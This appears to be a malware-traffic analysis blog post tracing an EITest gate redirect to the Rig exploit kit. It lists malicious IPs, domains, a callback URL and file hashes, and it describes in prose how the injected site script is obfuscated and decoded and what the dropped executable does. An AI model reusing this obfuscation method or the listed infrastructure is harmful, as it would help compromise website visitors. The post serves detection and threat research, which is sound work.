EITest Gate at 31.184.192.173 Leads to Rig EK at 185.141.25.28 and Drops… ?

IOCs:

  • 66.84.14.125 – orfab.com – Compromised Site
  • 31.184.192.173 – piperandscoot.top – EITest Gate
  • 185.141.25.28 – jxlyv.xajee73.top – Rig EK
  • 185.146.171.131/bt/logout.php – post infection callback traffic

Hashes:

SHA256: cc21bee629f99e6a5e5b433f593670b2dea4075b6252fb04fd1bfbb40fbf8e80
File name: EITest Flash Redirect.swf

SHA256: bf9cda2afc425019312f8c4bc5856ad8378ea980dcd3e195e615224c6777eb5c
File name: EITest Gate.html

SHA256: c73c63f4b5ebd3ebe7c4de16a99519c876a93c50b12b1a3406c28c2929752d68
File name: RigEK Landing Page.html

SHA256: 970491ca792332f3479200c94dddfe7d77112beb0b879d5becb279010860b487
File name: RigEK Flash Exploit.swf

Traffic:

traffic

As you can probably tell from the image of the traffic above I let the host sit a long time. I was hoping to grab more IOCs and get more clues as to the identity of the malware.

Unfortunately, I haven’t yet been able to ID this post-infection traffic. The IP has no reputation history on VirusTotal and searching for the URI or the IP via Google didn’t return any useful results. One thing I want to point out is that these POST requests were occurring in ten minute intervals.

Additional research showed that 185.146.171.131 belongs to AS 203049 CLOUDPRO in Russia. The Whois lookup information shows the netname being FIRSTBYTE-RU-MSK, which is a Russian hosting provider. I also happened to see the host making several DNS requests for PTR records. The reverse DNS request were for 131.171.146.185.in-addr.arpa. The response for these reverse DNS requests were the following:

dns-request-and-response

You can see from the UDP traffic above that the responses show three FirstByte DNS servers. On to the infection chain…

Infection Chain:

The infection chain for this started out with browsing to the compromised website. Below is an image showing the obfuscated and encoded EITest script in the website’s source code:

eitest-script

The script is being obfuscated and hex encoded. Using the replace() method to replace all underscores with percent signs removes the obfuscation and returns the hex encoded data. The hex encoded data is then decoded via the decodeURIComponent() function and then written to the document with the document.write() function. Here is the script fully deobfuscated and decoded:

eitest-script-decoded

The purpose of the EITest script is to give the host instructions to download the EITest Flash file. The location for the Flash file is shown in the URL in the script. Here is the GET request for that Flash file:

eitest-flash-redirect

The EITest Flash file is used as a redirection mechanism as it contains the URL for the EITest Gate. Shown below is the GET request (redirection) for the EITest gate:

eitest-gate

The EITest gate is the second stage redirection mechanism for this infection chain. For example, you can see that there is a “.href = ‘http:[Rig EK]'” containing the URL for the Rig EK landing page.

Here is the GET request for the landing page, as well as the GET requests for the Rig EK Flash Exploit and the payload:

rigek-landing-page-and-flash-exploitrigek-payload

The infection from the Rig EK server caused a .tmp file to be dropped in %TEMP% and an executable named 1miy35koc5c3.exe.

temp

That executable has a file description of “Windows Audit Service Update”. This payload seemed to be very similar to my last EITest infection written about HERE.

Here are some registry keys created by the malware:

regeditregedit-1regedit-2

Notice that the file path shows “C:\ProgramData\Windows Audit Service Update\1miy35koc5c3.exe” however the malware has now hidden C:\ProgramData\ from me even though I have enabled show all hidden files:

hidden-files

More to come later…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: